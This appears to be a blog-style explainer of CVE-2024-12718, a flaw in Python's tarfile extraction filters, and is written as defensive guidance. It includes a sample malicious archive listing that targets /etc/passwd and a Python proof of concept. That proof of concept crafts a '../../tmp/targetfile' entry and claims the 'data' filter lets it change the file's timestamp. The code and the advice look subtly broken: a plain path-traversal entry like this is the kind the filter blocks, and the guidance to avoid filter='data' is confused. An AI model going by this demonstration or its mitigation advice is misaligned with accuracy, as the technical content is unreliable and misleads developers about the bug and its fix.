CVE-2024-12718 - How Python’s tarfile Extraction Filters Can Mess with Your Files

What is CVE-2024-12718?
CVE-2024-12718 is a newly reported vulnerability in the Python tarfile module. In simple words, it’s a security hole in how Python (version 3.12 and later) extracts tar archives if you use the new filter parameter introduced in recent Python versions. Attackers could take advantage of this bug to change certain attributes of files outside the directory you thought you were extracting into—like file permissions or metadata—which could lead to unauthorized changes on your system.

This is especially a problem if your code uses untrusted tar files, for example, things downloaded from the internet, pulled from email attachments, or user uploads.

Who is Affected?

- You’re using Python 3.12 or above (older versions are safe—not because they’re more secure, but because they don’t have this new filter feature).
- You use the tarfile module’s extract() or extractall() methods with the filter argument set to "data" or "tar".
- Starting with Python 3.14, the default value for filter is "data", so if you haven’t set filter yourself, you may still be exposed.

Why Does This Happen?

The new filter feature was supposed to make things safer—for example, by preventing unwanted file overwriting or symlink attacks. But it turns out, if you use either the "data" or "tar" filter, a malicious tar archive can still:

Change the modification times of files outside the extraction directory (with "data" filter).

- Overwrite the file permissions (chmod) of files anywhere on your system, as long as the file already exists and the user running Python has access (with "tar" filter).

Read the official documentation here:
👉 Python tarfile extraction filters

A Simple Exploit Example

Let’s say an attacker sends you a tar archive that looks like it only contains a harmless directory, but actually contains a file reference like this:

# Malicious tarpath example
evil-archive.tar:
    ./innocent.txt
    ../../etc/passwd

If the archive is crafted cleverly (and you don’t double-check), the attacker can change file metadata like last-modified time, or modify permissions on /etc/passwd if "tar" filter is used. Here’s how you might accidentally extract it in your code:

import tarfile

# This is unsafe if 'evil-archive.tar' is untrusted!
with tarfile.open('evil-archive.tar', 'r') as tar:
    tar.extractall(path='somewhere/', filter='data')   # Also filter='tar' is risky!

With the "data" filter, the code can update "last modified" timestamps on /etc/passwd. With "tar", if the tar archive specifies, it could even change that file’s permissions (e.g., make it writable).

Let’s see how file modification time could be altered outside your target folder

import tarfile
import os
import time

# Prepare a file to target
with open('/tmp/targetfile', 'w') as f:
    f.write('original')

# Attacker's tarfile: entry with ../../tmp/targetfile and custom mtime
import tarfile
tar = tarfile.open('evil.tar', 'w')
info = tarfile.TarInfo('../../tmp/targetfile')
info.mtime = time.time() + 100000  # Future mtime for demonstration
tar.addfile(info, open('/tmp/targetfile', 'rb'))
tar.close()

# Now extraction (this happens on the victim's side)
with tarfile.open('evil.tar') as tf:
    tf.extractall('safe_place', filter="data")

print("Modified time:", time.ctime(os.path.getmtime('/tmp/targetfile')))

If you run this, your /tmp/targetfile’s modification time will be updated even though it’s *outside* the intended extraction directory.

Real Exploit: Changing Permissions with filter="tar"

Similarly, with "tar" filter, permissions (chmod) can be changed on arbitrary files. This could be used to make sensitive files world-writable, or to lock out access.

What Should You Do?

### 1. Don’t extract untrusted tars with Python’s tarfile module and "data"/"tar" filters.
This includes archives from anywhere you can’t absolutely trust.

### 2. Double-check your use of extract() / extractall().
Make sure you’re not using filter="data" or filter="tar" when working with untrusted archives.

3. Know your Python version!

Remember, the risky behavior is the new default in Python 3.14 and later.

4. Consider using safe-tar (third-party) or use a manual member check.

If you *must* deal with untrusted tar files, consider third-party “safe tar” extraction modules, or manually check for dangerous filenames (like those with .. or absolute paths).

5. Watch for patches from Python.

Keep your Python installation up to date, and watch for future fixes for this CVE.

Does This Affect pip or Source Distributions?

Not really. Building a package from a tar source distribution is already risky because Python packaging allows arbitrary code execution in build scripts. But you *should still* avoid installing suspicious or untrusted tar archives.


## More Info / Official References

- Official Python tarfile extraction filters documentation
- CVE-2024-12718 at NVD (will be published soon)
- Python Security Announcements

TL;DR

CVE-2024-12718 means that Python’s new tarfile extraction filters aren't as safe as you thought—they can let hackers change file timestamps or permissions outside your chosen extraction folder. Don’t extract untrusted archives with filter="data" or filter="tar", know which Python version you’re running, and keep your software up to date!

Timeline

Published on: 06/03/2025 13:15:20 UTC
Last modified on: 06/04/2025 14:54:33 UTC